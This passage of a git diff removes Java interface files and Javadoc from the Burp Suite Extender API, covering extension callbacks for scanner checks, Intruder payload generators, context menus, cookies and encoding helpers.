- * - * @return A list of Proxy listeners that are currently registered by this - * extension. - */ - List getProxyListeners(); - - /** - * This method is used to remove a Proxy listener that has been registered - * by the extension. - * - * @param listener The Proxy listener to be removed. - */ - void removeProxyListener(IProxyListener listener); - - /** - * This method is used to register a listener which will be notified of new - * issues that are reported by the Scanner tool. Extensions can perform - * custom analysis or logging of Scanner issues by registering a Scanner - * listener. - * - * @param listener An object created by the extension that implements the - * IScannerListener interface. - */ - void registerScannerListener(IScannerListener listener); - - /** - * This method is used to retrieve the Scanner listeners that are registered - * by the extension. - * - * @return A list of Scanner listeners that are currently registered by this - * extension. - */ - List getScannerListeners(); - - /** - * This method is used to remove a Scanner listener that has been registered - * by the extension. - * - * @param listener The Scanner listener to be removed. - */ - void removeScannerListener(IScannerListener listener); - - /** - * This method is used to register a listener which will be notified of - * changes to Burp's suite-wide target scope. - * - * @param listener An object created by the extension that implements the - * IScopeChangeListener interface. - */ - void registerScopeChangeListener(IScopeChangeListener listener); - - /** - * This method is used to retrieve the scope change listeners that are - * registered by the extension. - * - * @return A list of scope change listeners that are currently registered by - * this extension. - */ - List getScopeChangeListeners(); - - /** - * This method is used to remove a scope change listener that has been - * registered by the extension. - * - * @param listener The scope change listener to be removed. - */ - void removeScopeChangeListener(IScopeChangeListener listener); - - /** - * This method is used to register a factory for custom context menu items. - * When the user invokes a context menu anywhere within Burp, the factory - * will be passed details of the invocation event, and asked to provide any - * custom context menu items that should be shown. - * - * @param factory An object created by the extension that implements the - * IContextMenuFactory interface. - */ - void registerContextMenuFactory(IContextMenuFactory factory); - - /** - * This method is used to retrieve the context menu factories that are - * registered by the extension. - * - * @return A list of context menu factories that are currently registered by - * this extension. - */ - List getContextMenuFactories(); - - /** - * This method is used to remove a context menu factory that has been - * registered by the extension. - * - * @param factory The context menu factory to be removed. - */ - void removeContextMenuFactory(IContextMenuFactory factory); - - /** - * This method is used to register a factory for custom message editor tabs. - * For each message editor that already exists, or is subsequently created, - * within Burp, the factory will be asked to provide a new instance of an - * IMessageEditorTab object, which can provide custom rendering - * or editing of HTTP messages. - * - * @param factory An object created by the extension that implements the - * IMessageEditorTabFactory interface. - */ - void registerMessageEditorTabFactory(IMessageEditorTabFactory factory); - - /** - * This method is used to retrieve the message editor tab factories that are - * registered by the extension. - * - * @return A list of message editor tab factories that are currently - * registered by this extension. - */ - List getMessageEditorTabFactories(); - - /** - * This method is used to remove a message editor tab factory that has been - * registered by the extension. - * - * @param factory The message editor tab factory to be removed. - */ - void removeMessageEditorTabFactory(IMessageEditorTabFactory factory); - - /** - * This method is used to register a provider of Scanner insertion points. - * For each base request that is actively scanned, Burp will ask the - * provider to provide any custom scanner insertion points that are - * appropriate for the request. - * - * @param provider An object created by the extension that implements the - * IScannerInsertionPointProvider interface. - */ - void registerScannerInsertionPointProvider( - IScannerInsertionPointProvider provider); - - /** - * This method is used to retrieve the Scanner insertion point providers - * that are registered by the extension. - * - * @return A list of Scanner insertion point providers that are currently - * registered by this extension. - */ - List getScannerInsertionPointProviders(); - - /** - * This method is used to remove a Scanner insertion point provider that has - * been registered by the extension. - * - * @param provider The Scanner insertion point provider to be removed. - */ - void removeScannerInsertionPointProvider( - IScannerInsertionPointProvider provider); - - /** - * This method is used to register a custom Scanner check. When performing - * scanning, Burp will ask the check to perform active or passive scanning - * on the base request, and report any Scanner issues that are identified. - * - * @param check An object created by the extension that implements the - * IScannerCheck interface. - */ - void registerScannerCheck(IScannerCheck check); - - /** - * This method is used to retrieve the Scanner checks that are registered by - * the extension. - * - * @return A list of Scanner checks that are currently registered by this - * extension. - */ - List getScannerChecks(); - - /** - * This method is used to remove a Scanner check that has been registered by - * the extension. - * - * @param check The Scanner check to be removed. - */ - void removeScannerCheck(IScannerCheck check); - - /** - * This method is used to register a factory for Intruder payloads. Each - * registered factory will be available within the Intruder UI for the user - * to select as the payload source for an attack. When this is selected, the - * factory will be asked to provide a new instance of an - * IIntruderPayloadGenerator object, which will be used to - * generate payloads for the attack. - * - * @param factory An object created by the extension that implements the - * IIntruderPayloadGeneratorFactory interface. - */ - void registerIntruderPayloadGeneratorFactory( - IIntruderPayloadGeneratorFactory factory); - - /** - * This method is used to retrieve the Intruder payload generator factories - * that are registered by the extension. - * - * @return A list of Intruder payload generator factories that are currently - * registered by this extension. - */ - List - getIntruderPayloadGeneratorFactories(); - - /** - * This method is used to remove an Intruder payload generator factory that - * has been registered by the extension. - * - * @param factory The Intruder payload generator factory to be removed. - */ - void removeIntruderPayloadGeneratorFactory( - IIntruderPayloadGeneratorFactory factory); - - /** - * This method is used to register a custom Intruder payload processor. Each - * registered processor will be available within the Intruder UI for the - * user to select as the action for a payload processing rule. - * - * @param processor An object created by the extension that implements the - * IIntruderPayloadProcessor interface. - */ - void registerIntruderPayloadProcessor(IIntruderPayloadProcessor processor); - - /** - * This method is used to retrieve the Intruder payload processors that are - * registered by the extension. - * - * @return A list of Intruder payload processors that are currently - * registered by this extension. - */ - List getIntruderPayloadProcessors(); - - /** - * This method is used to remove an Intruder payload processor that has been - * registered by the extension. - * - * @param processor The Intruder payload processor to be removed. - */ - void removeIntruderPayloadProcessor(IIntruderPayloadProcessor processor); - - /** - * This method is used to register a custom session handling action. Each - * registered action will be available within the session handling rule UI - * for the user to select as a rule action. Users can choose to invoke an - * action directly in its own right, or following execution of a macro. - * - * @param action An object created by the extension that implements the - * ISessionHandlingAction interface. - */ - void registerSessionHandlingAction(ISessionHandlingAction action); - - /** - * This method is used to retrieve the session handling actions that are - * registered by the extension. - * - * @return A list of session handling actions that are currently registered - * by this extension. - */ - List getSessionHandlingActions(); - - /** - * This method is used to remove a session handling action that has been - * registered by the extension. - * - * @param action The extension session handling action to be removed. - */ - void removeSessionHandlingAction(ISessionHandlingAction action); - - /** - * This method is used to unload the extension from Burp Suite. - */ - void unloadExtension(); - - /** - * This method is used to add a custom tab to the main Burp Suite window. - * - * @param tab An object created by the extension that implements the - * ITab interface. - */ - void addSuiteTab(ITab tab); - - /** - * This method is used to remove a previously-added tab from the main Burp - * Suite window. - * - * @param tab An object created by the extension that implements the - * ITab interface. - */ - void removeSuiteTab(ITab tab); - - /** - * This method is used to customize UI components in line with Burp's UI - * style, including font size, colors, table line spacing, etc. The action - * is performed recursively on any child components of the passed-in - * component. - * - * @param component The UI component to be customized. - */ - void customizeUiComponent(Component component); - - /** - * This method is used to create a new instance of Burp's HTTP message - * editor, for the extension to use in its own UI. - * - * @param controller An object created by the extension that implements the - * IMessageEditorController interface. This parameter is - * optional and may be null. If it is provided, then the - * message editor will query the controller when required to obtain details - * about the currently displayed message, including the - * IHttpService for the message, and the associated request or - * response message. If a controller is not provided, then the message - * editor will not support context menu actions, such as sending requests to - * other Burp tools. - * @param editable Indicates whether the editor created should be editable, - * or used only for message viewing. - * @return An object that implements the IMessageEditor - * interface, and which the extension can use in its own UI. - */ - IMessageEditor createMessageEditor(IMessageEditorController controller, - boolean editable); - - /** - * This method returns the command line arguments that were passed to Burp - * on startup. - * - * @return The command line arguments that were passed to Burp on startup. - */ - String[] getCommandLineArguments(); - - /** - * This method is used to save configuration settings for the extension in a - * persistent way that survives reloads of the extension and of Burp Suite. - * Saved settings can be retrieved using the method - * loadExtensionSetting(). - * - * @param name The name of the setting. - * @param value The value of the setting. If this value is null - * then any existing setting with the specified name will be removed. - */ - void saveExtensionSetting(String name, String value); - - /** - * This method is used to load configuration settings for the extension that - * were saved using the method - * saveExtensionSetting(). - * - * @param name The name of the setting. - * @return The value of the setting, or null if no value is - * set. - */ - String loadExtensionSetting(String name); - - /** - * This method is used to create a new instance of Burp's plain text editor, - * for the extension to use in its own UI. - * - * @return An object that implements the ITextEditor interface, - * and which the extension can use in its own UI. - */ - ITextEditor createTextEditor(); - - /** - * This method can be used to send an HTTP request to the Burp Repeater - * tool. The request will be displayed in the user interface, but will not - * be issued until the user initiates this action. - * - * @param host The hostname of the remote HTTP server. - * @param port The port of the remote HTTP server. - * @param useHttps Flags whether the protocol is HTTPS or HTTP. - * @param request The full HTTP request. - * @param tabCaption An optional caption which will appear on the Repeater - * tab containing the request. If this value is null then a - * default tab index will be displayed. - */ - void sendToRepeater( - String host, - int port, - boolean useHttps, - byte[] request, - String tabCaption); - - /** - * This method can be used to send an HTTP request to the Burp Intruder - * tool. The request will be displayed in the user interface, and markers - * for attack payloads will be placed into default locations within the - * request. - * - * @param host The hostname of the remote HTTP server. - * @param port The port of the remote HTTP server. - * @param useHttps Flags whether the protocol is HTTPS or HTTP. - * @param request The full HTTP request. - */ - void sendToIntruder( - String host, - int port, - boolean useHttps, - byte[] request); - - /** - * This method can be used to send an HTTP request to the Burp Intruder - * tool. The request will be displayed in the user interface, and markers - * for attack payloads will be placed into the specified locations within - * the request. - * - * @param host The hostname of the remote HTTP server. - * @param port The port of the remote HTTP server. - * @param useHttps Flags whether the protocol is HTTPS or HTTP. - * @param request The full HTTP request. - * @param payloadPositionOffsets A list of index pairs representing the - * payload positions to be used. Each item in the list must be an int[2] - * array containing the start and end offsets for the payload position. - */ - void sendToIntruder( - String host, - int port, - boolean useHttps, - byte[] request, - List payloadPositionOffsets); - - /** - * This method can be used to send data to the Comparer tool. - * - * @param data The data to be sent to Comparer. - */ - void sendToComparer(byte[] data); - - /** - * This method can be used to send a seed URL to the Burp Spider tool. If - * the URL is not within the current Spider scope, the user will be asked if - * they wish to add the URL to the scope. If the Spider is not currently - * running, it will be started. The seed URL will be requested, and the - * Spider will process the application's response in the normal way. - * - * @param url The new seed URL to begin spidering from. - */ - void sendToSpider( - java.net.URL url); - - /** - * This method can be used to send an HTTP request to the Burp Scanner tool - * to perform an active vulnerability scan. If the request is not within the - * current active scanning scope, the user will be asked if they wish to - * proceed with the scan. - * - * @param host The hostname of the remote HTTP server. - * @param port The port of the remote HTTP server. - * @param useHttps Flags whether the protocol is HTTPS or HTTP. - * @param request The full HTTP request. - * @return The resulting scan queue item. - */ - IScanQueueItem doActiveScan( - String host, - int port, - boolean useHttps, - byte[] request); - - /** - * This method can be used to send an HTTP request to the Burp Scanner tool - * to perform an active vulnerability scan, based on a custom list of - * insertion points that are to be scanned. If the request is not within the - * current active scanning scope, the user will be asked if they wish to - * proceed with the scan. - * - * @param host The hostname of the remote HTTP server. - * @param port The port of the remote HTTP server. - * @param useHttps Flags whether the protocol is HTTPS or HTTP. - * @param request The full HTTP request. - * @param insertionPointOffsets A list of index pairs representing the - * positions of the insertion points that should be scanned. Each item in - * the list must be an int[2] array containing the start and end offsets for - * the insertion point. - * @return The resulting scan queue item. - */ - IScanQueueItem doActiveScan( - String host, - int port, - boolean useHttps, - byte[] request, - List insertionPointOffsets); - - /** - * This method can be used to send an HTTP request to the Burp Scanner tool - * to perform a passive vulnerability scan. - * - * @param host The hostname of the remote HTTP server. - * @param port The port of the remote HTTP server. - * @param useHttps Flags whether the protocol is HTTPS or HTTP. - * @param request The full HTTP request. - * @param response The full HTTP response. - */ - void doPassiveScan( - String host, - int port, - boolean useHttps, - byte[] request, - byte[] response); - - /** - * This method can be used to issue HTTP requests and retrieve their - * responses. - * - * @param httpService The HTTP service to which the request should be sent. - * @param request The full HTTP request. - * @return An object that implements the IHttpRequestResponse - * interface, and which the extension can query to obtain the details of the - * response. - */ - IHttpRequestResponse makeHttpRequest(IHttpService httpService, - byte[] request); - - /** - * This method can be used to issue HTTP requests and retrieve their - * responses. - * - * @param host The hostname of the remote HTTP server. - * @param port The port of the remote HTTP server. - * @param useHttps Flags whether the protocol is HTTPS or HTTP. - * @param request The full HTTP request. - * @return The full response retrieved from the remote server. - */ - byte[] makeHttpRequest( - String host, - int port, - boolean useHttps, - byte[] request); - - /** - * This method can be used to query whether a specified URL is within the - * current Suite-wide scope. - * - * @param url The URL to query. - * @return Returns true if the URL is within the current - * Suite-wide scope. - */ - boolean isInScope(java.net.URL url); - - /** - * This method can be used to include the specified URL in the Suite-wide - * scope. - * - * @param url The URL to include in the Suite-wide scope. - */ - void includeInScope(java.net.URL url); - - /** - * This method can be used to exclude the specified URL from the Suite-wide - * scope. - * - * @param url The URL to exclude from the Suite-wide scope. - */ - void excludeFromScope(java.net.URL url); - - /** - * This method can be used to display a specified message in the Burp Suite - * alerts tab. - * - * @param message The alert message to display. - */ - void issueAlert(String message); - - /** - * This method returns details of all items in the Proxy history. - * - * @return The contents of the Proxy history. - */ - IHttpRequestResponse[] getProxyHistory(); - - /** - * This method returns details of items in the site map. - * - * @param urlPrefix This parameter can be used to specify a URL prefix, in - * order to extract a specific subset of the site map. The method performs a - * simple case-sensitive text match, returning all site map items whose URL - * begins with the specified prefix. If this parameter is null, the entire - * site map is returned. - * - * @return Details of items in the site map. - */ - IHttpRequestResponse[] getSiteMap(String urlPrefix); - - /** - * This method returns all of the current scan issues for URLs matching the - * specified literal prefix. - * - * @param urlPrefix This parameter can be used to specify a URL prefix, in - * order to extract a specific subset of scan issues. The method performs a - * simple case-sensitive text match, returning all scan issues whose URL - * begins with the specified prefix. If this parameter is null, all issues - * are returned. - * @return Details of the scan issues. - */ - IScanIssue[] getScanIssues(String urlPrefix); - - /** - * This method is used to generate a report for the specified Scanner - * issues. The report format can be specified. For all other reporting - * options, the default settings that appear in the reporting UI wizard are - * used. - * - * @param format The format to be used in the report. Accepted values are - * HTML and XML. - * @param issues The Scanner issues to be reported. - * @param file The file to which the report will be saved. - */ - void generateScanReport(String format, IScanIssue[] issues, - java.io.File file); - - /** - * This method is used to retrieve the contents of Burp's session handling - * cookie jar. Extensions that provide an - * ISessionHandlingAction can query and update the cookie jar - * in order to handle unusual session handling mechanisms. - * - * @return A list of ICookie objects representing the contents - * of Burp's session handling cookie jar. - */ - List getCookieJarContents(); - - /** - * This method is used to update the contents of Burp's session handling - * cookie jar. Extensions that provide an - * ISessionHandlingAction can query and update the cookie jar - * in order to handle unusual session handling mechanisms. - * - * @param cookie An ICookie object containing details of the - * cookie to be updated. If the cookie jar already contains a cookie that - * matches the specified domain and name, then that cookie will be updated - * with the new value and expiration, unless the new value is - * null, in which case the cookie will be removed. If the - * cookie jar does not already contain a cookie that matches the specified - * domain and name, then the cookie will be added. - */ - void updateCookieJar(ICookie cookie); - - /** - * This method can be used to add an item to Burp's site map with the - * specified request/response details. This will overwrite the details of - * any existing matching item in the site map. - * - * @param item Details of the item to be added to the site map - */ - void addToSiteMap(IHttpRequestResponse item); - - /** - * This method can be used to restore Burp's state from a specified saved - * state file. This method blocks until the restore operation is completed, - * and must not be called from the event dispatch thread. - * - * @param file The file containing Burp's saved state. - */ - void restoreState(java.io.File file); - - /** - * This method can be used to save Burp's state to a specified file. This - * method blocks until the save operation is completed, and must not be - * called from the event dispatch thread. - * - * @param file The file to save Burp's state in. - */ - void saveState(java.io.File file); - - /** - * This method causes Burp to save all of its current configuration as a Map - * of name/value Strings. - * - * @return A Map of name/value Strings reflecting Burp's current - * configuration. - */ - Map saveConfig(); - - /** - * This method causes Burp to load a new configuration from the Map of - * name/value Strings provided. Any settings not specified in the Map will - * be restored to their default values. To selectively update only some - * settings and leave the rest unchanged, you should first call - * saveConfig() to obtain Burp's current configuration, modify - * the relevant items in the Map, and then call - * loadConfig() with the same Map. - * - * @param config A map of name/value Strings to use as Burp's new - * configuration. - */ - void loadConfig(Map config); - - /** - * This method sets the master interception mode for Burp Proxy. - * - * @param enabled Indicates whether interception of Proxy messages should be - * enabled. - */ - void setProxyInterceptionEnabled(boolean enabled); - - /** - * This method retrieves information about the version of Burp in which the - * extension is running. It can be used by extensions to dynamically adjust - * their behavior depending on the functionality and APIs supported by the - * current version. - * - * @return An array of Strings comprised of: the product name (e.g. Burp - * Suite Professional), the major version (e.g. 1.5), the minor version - * (e.g. 03) - */ - String[] getBurpVersion(); - - /** - * This method can be used to shut down Burp programmatically, with an - * optional prompt to the user. If the method returns, the user canceled the - * shutdown prompt. - * - * @param promptUser Indicates whether to prompt the user to confirm the - * shutdown. - */ - void exitSuite(boolean promptUser); - - /** - * This method is used to create a temporary file on disk containing the - * provided data. Extensions can use temporary files for long-term storage - * of runtime data, avoiding the need to retain that data in memory. - * - * @param buffer The data to be saved to a temporary file. - * @return An object that implements the ITempFile interface. - */ - ITempFile saveToTempFile(byte[] buffer); - - /** - * This method is used to save the request and response of an - * IHttpRequestResponse object to temporary files, so that they - * are no longer held in memory. Extensions can used this method to convert - * IHttpRequestResponse objects into a form suitable for - * long-term storage. - * - * @param httpRequestResponse The IHttpRequestResponse object - * whose request and response messages are to be saved to temporary files. - * @return An object that implements the - * IHttpRequestResponsePersisted interface. - */ - IHttpRequestResponsePersisted saveBuffersToTempFiles( - IHttpRequestResponse httpRequestResponse); - - /** - * This method is used to apply markers to an HTTP request or response, at - * offsets into the message that are relevant for some particular purpose. - * Markers are used in various situations, such as specifying Intruder - * payload positions, Scanner insertion points, and highlights in Scanner - * issues. - * - * @param httpRequestResponse The IHttpRequestResponse object - * to which the markers should be applied. - * @param requestMarkers A list of index pairs representing the offsets of - * markers to be applied to the request message. Each item in the list must - * be an int[2] array containing the start and end offsets for the marker. - * The markers in the list should be in sequence and not overlapping. This - * parameter is optional and may be null if no request markers - * are required. - * @param responseMarkers A list of index pairs representing the offsets of - * markers to be applied to the response message. Each item in the list must - * be an int[2] array containing the start and end offsets for the marker. - * The markers in the list should be in sequence and not overlapping. This - * parameter is optional and may be null if no response markers - * are required. - * @return An object that implements the - * IHttpRequestResponseWithMarkers interface. - */ - IHttpRequestResponseWithMarkers applyMarkers( - IHttpRequestResponse httpRequestResponse, - List requestMarkers, - List responseMarkers); - - /** - * This method is used to obtain the descriptive name for the Burp tool - * identified by the tool flag provided. - * - * @param toolFlag A flag identifying a Burp tool ( TOOL_PROXY, - * TOOL_SCANNER, etc.). Tool flags are defined within this - * interface. - * @return The descriptive name for the specified tool. - */ - String getToolName(int toolFlag); - - /** - * This method is used to register a new Scanner issue. Note: - * Wherever possible, extensions should implement custom Scanner checks - * using - * IScannerCheck and report issues via those checks, so as to - * integrate with Burp's user-driven workflow, and ensure proper - * consolidation of duplicate reported issues. This method is only designed - * for tasks outside of the normal testing workflow, such as importing - * results from other scanning tools. - * - * @param issue An object created by the extension that implements the - * IScanIssue interface. - */ - void addScanIssue(IScanIssue issue); - - /** - * This method parses the specified request and returns details of each - * request parameter. - * - * @param request The request to be parsed. - * @return An array of: String[] { name, value, type } - * containing details of the parameters contained within the request. - * @deprecated Use IExtensionHelpers.analyzeRequest() instead. - */ - @Deprecated - String[][] getParameters(byte[] request); - - /** - * This method parses the specified request and returns details of each HTTP - * header. - * - * @param message The request to be parsed. - * @return An array of HTTP headers. - * @deprecated Use IExtensionHelpers.analyzeRequest() or - * IExtensionHelpers.analyzeResponse() instead. - */ - @Deprecated - String[] getHeaders(byte[] message); - - /** - * This method can be used to register a new menu item which will appear on - * the various context menus that are used throughout Burp Suite to handle - * user-driven actions. - * - * @param menuItemCaption The caption to be displayed on the menu item. - * @param menuItemHandler The handler to be invoked when the user clicks on - * the menu item. - * @deprecated Use registerContextMenuFactory() instead. - */ - @Deprecated - void registerMenuItem( - String menuItemCaption, - IMenuItemHandler menuItemHandler); -} diff --git a/src/burp/IContextMenuFactory.java b/src/burp/IContextMenuFactory.java deleted file mode 100644 index 6edc628..0000000 --- a/src/burp/IContextMenuFactory.java +++ /dev/null @@ -1,38 +0,0 @@ -package burp; - -/* - * @(#)IContextMenuFactory.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -import java.util.List; -import javax.swing.JMenuItem; - -/** - * Extensions can implement this interface and then call - * IBurpExtenderCallbacks.registerContextMenuFactory() to register - * a factory for custom context menu items. - */ -public interface IContextMenuFactory -{ - /** - * This method will be called by Burp when the user invokes a context menu - * anywhere within Burp. The factory can then provide any custom context - * menu items that should be displayed in the context menu, based on the - * details of the menu invocation. - * - * @param invocation An object that implements the - * IMessageEditorTabFactory interface, which the extension can - * query to obtain details of the context menu invocation. - * @return A list of custom menu items (which may include sub-menus, - * checkbox menu items, etc.) that should be displayed. Extensions may - * return - * null from this method, to indicate that no menu items are - * required. - */ - List createMenuItems(IContextMenuInvocation invocation); -} diff --git a/src/burp/IContextMenuInvocation.java b/src/burp/IContextMenuInvocation.java deleted file mode 100644 index 27f8553..0000000 --- a/src/burp/IContextMenuInvocation.java +++ /dev/null @@ -1,156 +0,0 @@ -package burp; - -/* - * @(#)IContextMenuInvocation.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -import java.awt.event.InputEvent; - -/** - * This interface is used when Burp calls into an extension-provided - * IContextMenuFactory with details of a context menu invocation. - * The custom context menu factory can query this interface to obtain details of - * the invocation event, in order to determine what menu items should be - * displayed. - */ -public interface IContextMenuInvocation -{ - /** - * Used to indicate that the context menu is being invoked in a request - * editor. - */ - static final byte CONTEXT_MESSAGE_EDITOR_REQUEST = 0; - /** - * Used to indicate that the context menu is being invoked in a response - * editor. - */ - static final byte CONTEXT_MESSAGE_EDITOR_RESPONSE = 1; - /** - * Used to indicate that the context menu is being invoked in a non-editable - * request viewer. - */ - static final byte CONTEXT_MESSAGE_VIEWER_REQUEST = 2; - /** - * Used to indicate that the context menu is being invoked in a non-editable - * response viewer. - */ - static final byte CONTEXT_MESSAGE_VIEWER_RESPONSE = 3; - /** - * Used to indicate that the context menu is being invoked in the Target - * site map tree. - */ - static final byte CONTEXT_TARGET_SITE_MAP_TREE = 4; - /** - * Used to indicate that the context menu is being invoked in the Target - * site map table. - */ - static final byte CONTEXT_TARGET_SITE_MAP_TABLE = 5; - /** - * Used to indicate that the context menu is being invoked in the Proxy - * history. - */ - static final byte CONTEXT_PROXY_HISTORY = 6; - /** - * Used to indicate that the context menu is being invoked in the Scanner - * results. - */ - static final byte CONTEXT_SCANNER_RESULTS = 7; - /** - * Used to indicate that the context menu is being invoked in the Intruder - * payload positions editor. - */ - static final byte CONTEXT_INTRUDER_PAYLOAD_POSITIONS = 8; - /** - * Used to indicate that the context menu is being invoked in an Intruder - * attack results. - */ - static final byte CONTEXT_INTRUDER_ATTACK_RESULTS = 9; - /** - * Used to indicate that the context menu is being invoked in a search - * results window. - */ - static final byte CONTEXT_SEARCH_RESULTS = 10; - - /** - * This method can be used to retrieve the native Java input event that was - * the trigger for the context menu invocation. - * - * @return The InputEvent that was the trigger for the context - * menu invocation. - */ - InputEvent getInputEvent(); - - /** - * This method can be used to retrieve the Burp tool within which the - * context menu was invoked. - * - * @return A flag indicating the Burp tool within which the context menu was - * invoked. Burp tool flags are defined in the - * IBurpExtenderCallbacks interface. - */ - int getToolFlag(); - - /** - * This method can be used to retrieve the context within which the menu was - * invoked. - * - * @return An index indicating the context within which the menu was - * invoked. The indices used are defined within this interface. - */ - byte getInvocationContext(); - - /** - * This method can be used to retrieve the bounds of the user's selection - * into the current message, if applicable. - * - * @return An int[2] array containing the start and end offsets of the - * user's selection in the current message. If the user has not made any - * selection in the current message, both offsets indicate the position of - * the caret within the editor. If the menu is not being invoked from a - * message editor, the method returns null. - */ - int[] getSelectionBounds(); - - /** - * This method can be used to retrieve details of the HTTP requests / - * responses that were shown or selected by the user when the context menu - * was invoked. - * - * Note: For performance reasons, the objects returned from this - * method are tied to the originating context of the messages within the - * Burp UI. For example, if a context menu is invoked on the Proxy intercept - * panel, then the - * IHttpRequestResponse returned by this method will reflect - * the current contents of the interception panel, and this will change when - * the current message has been forwarded or dropped. If your extension - * needs to store details of the message for which the context menu has been - * invoked, then you should query those details from the - * IHttpRequestResponse at the time of invocation, or you - * should use - * IBurpExtenderCallbacks.saveBuffersToTempFiles() to create a - * persistent read-only copy of the - * IHttpRequestResponse. - * - * @return An array of IHttpRequestResponse objects - * representing the items that were shown or selected by the user when the - * context menu was invoked. This method returns null if no - * messages are applicable to the invocation. - */ - IHttpRequestResponse[] getSelectedMessages(); - - /** - * This method can be used to retrieve details of the Scanner issues that - * were selected by the user when the context menu was invoked. - * - * @return An array of IScanIssue objects representing the - * issues that were selected by the user when the context menu was invoked. - * This method returns null if no Scanner issues are applicable - * to the invocation. - */ - IScanIssue[] getSelectedIssues(); -} diff --git a/src/burp/ICookie.java b/src/burp/ICookie.java deleted file mode 100644 index 4f1160e..0000000 --- a/src/burp/ICookie.java +++ /dev/null @@ -1,53 +0,0 @@ -package burp; - -/* - * @(#)ICookie.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -import java.util.Date; - -/** - * This interface is used to hold details about an HTTP cookie. - */ -public interface ICookie -{ - /** - * This method is used to retrieve the domain for which the cookie is in - * scope. - * - * @return The domain for which the cookie is in scope. Note: For - * cookies that have been analyzed from responses (by calling - * IExtensionHelpers.analyzeResponse() and then - * IResponseInfo.getCookies(), the domain will be - * null if the response did not explicitly set a domain - * attribute for the cookie. - */ - String getDomain(); - - /** - * This method is used to retrieve the expiration time for the cookie. - * - * @return The expiration time for the cookie, or - * null if none is set (i.e., for non-persistent session - * cookies). - */ - Date getExpiration(); - - /** - * This method is used to retrieve the name of the cookie. - * - * @return The name of the cookie. - */ - String getName(); - - /** - * This method is used to retrieve the value of the cookie. - * @return The value of the cookie. - */ - String getValue(); -} diff --git a/src/burp/IExtensionHelpers.java b/src/burp/IExtensionHelpers.java deleted file mode 100644 index 58cd9fb..0000000 --- a/src/burp/IExtensionHelpers.java +++ /dev/null @@ -1,352 +0,0 @@ -package burp; - -/* - * @(#)IExtensionHelpers.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -import java.net.URL; -import java.util.List; - -/** - * This interface contains a number of helper methods, which extensions can use - * to assist with various common tasks that arise for Burp extensions. - * - * Extensions can call - * IBurpExtenderCallbacks.getHelpers to obtain an instance of this - * interface. - */ -public interface IExtensionHelpers -{ - /** - * This method can be used to analyze an HTTP request, and obtain various - * key details about it. - * - * @param request An - * IHttpRequestResponse object containing the request to be - * analyzed. - * @return An - * IRequestInfo object that can be queried to obtain details - * about the request. - */ - IRequestInfo analyzeRequest(IHttpRequestResponse request); - - /** - * This method can be used to analyze an HTTP request, and obtain various - * key details about it. - * - * @param httpService The HTTP service associated with the request. This is - * optional and may be - * null, in which case the resulting - * IRequestInfo object will not include the full request URL. - * @param request The request to be analyzed. - * @return An - * IRequestInfo object that can be queried to obtain details - * about the request. - */ - IRequestInfo analyzeRequest(IHttpService httpService, byte[] request); - - /** - * This method can be used to analyze an HTTP request, and obtain various - * key details about it. The resulting - * IRequestInfo object will not include the full request URL. - * To obtain the full URL, use one of the other overloaded - * analyzeRequest() methods. - * - * @param request The request to be analyzed. - * @return An - * IRequestInfo object that can be queried to obtain details - * about the request. - */ - IRequestInfo analyzeRequest(byte[] request); - - /** - * This method can be used to analyze an HTTP response, and obtain various - * key details about it. - * - * @param response The response to be analyzed. - * @return An - * IResponseInfo object that can be queried to obtain details - * about the response. - */ - IResponseInfo analyzeResponse(byte[] response); - - /** - * This method can be used to retrieve details of a specified parameter - * within an HTTP request. Note: Use - * analyzeRequest() to obtain details of all parameters within - * the request. - * - * @param request The request to be inspected for the specified parameter. - * @param parameterName The name of the parameter to retrieve. - * @return An - * IParameter object that can be queried to obtain details - * about the parameter, or - * null if the parameter was not found. - */ - IParameter getRequestParameter(byte[] request, String parameterName); - - /** - * This method can be used to URL-decode the specified data. - * - * @param data The data to be decoded. - * @return The decoded data. - */ - String urlDecode(String data); - - /** - * This method can be used to URL-encode the specified data. Any characters - * that do not need to be encoded within HTTP requests are not encoded. - * - * @param data The data to be encoded. - * @return The encoded data. - */ - String urlEncode(String data); - - /** - * This method can be used to URL-decode the specified data. - * - * @param data The data to be decoded. - * @return The decoded data. - */ - byte[] urlDecode(byte[] data); - - /** - * This method can be used to URL-encode the specified data. Any characters - * that do not need to be encoded within HTTP requests are not encoded. - * - * @param data The data to be encoded. - * @return The encoded data. - */ - byte[] urlEncode(byte[] data); - - /** - * This method can be used to Base64-decode the specified data. - * - * @param data The data to be decoded. - * @return The decoded data. - */ - byte[] base64Decode(String data); - - /** - * This method can be used to Base64-decode the specified data. - * - * @param data The data to be decoded. - * @return The decoded data. - */ - byte[] base64Decode(byte[] data); - - /** - * This method can be used to Base64-encode the specified data. - * - * @param data The data to be encoded. - * @return The encoded data. - */ - String base64Encode(String data); - - /** - * This method can be used to Base64-encode the specified data. - * - * @param data The data to be encoded. - * @return The encoded data. - */ - String base64Encode(byte[] data); - - /** - * This method can be used to convert data from String form into an array of - * bytes. The conversion does not reflect any particular character set, and - * a character with the hex representation 0xWXYZ will always be converted - * into a byte with the representation 0xYZ. It performs the opposite - * conversion to the method - * bytesToString(), and byte-based data that is converted to a - * String and back again using these two methods is guaranteed to retain its - * integrity (which may not be the case with conversions that reflect a - * given character set). - * - * @param data The data to be converted. - * @return The converted data. - */ - byte[] stringToBytes(String data); - - /** - * This method can be used to convert data from an array of bytes into - * String form. The conversion does not reflect any particular character - * set, and a byte with the representation 0xYZ will always be converted - * into a character with the hex representation 0x00YZ. It performs the - * opposite conversion to the method - * stringToBytes(), and byte-based data that is converted to a - * String and back again using these two methods is guaranteed to retain its - * integrity (which may not be the case with conversions that reflect a - * given character set). - * - * @param data The data to be converted. - * @return The converted data. - */ - String bytesToString(byte[] data); - - /** - * This method searches a piece of data for the first occurrence of a - * specified pattern. It works on byte-based data in a way that is similar - * to the way the native Java method - * String.indexOf() works on String-based data. - * - * @param data The data to be searched. - * @param pattern The pattern to be searched for. - * 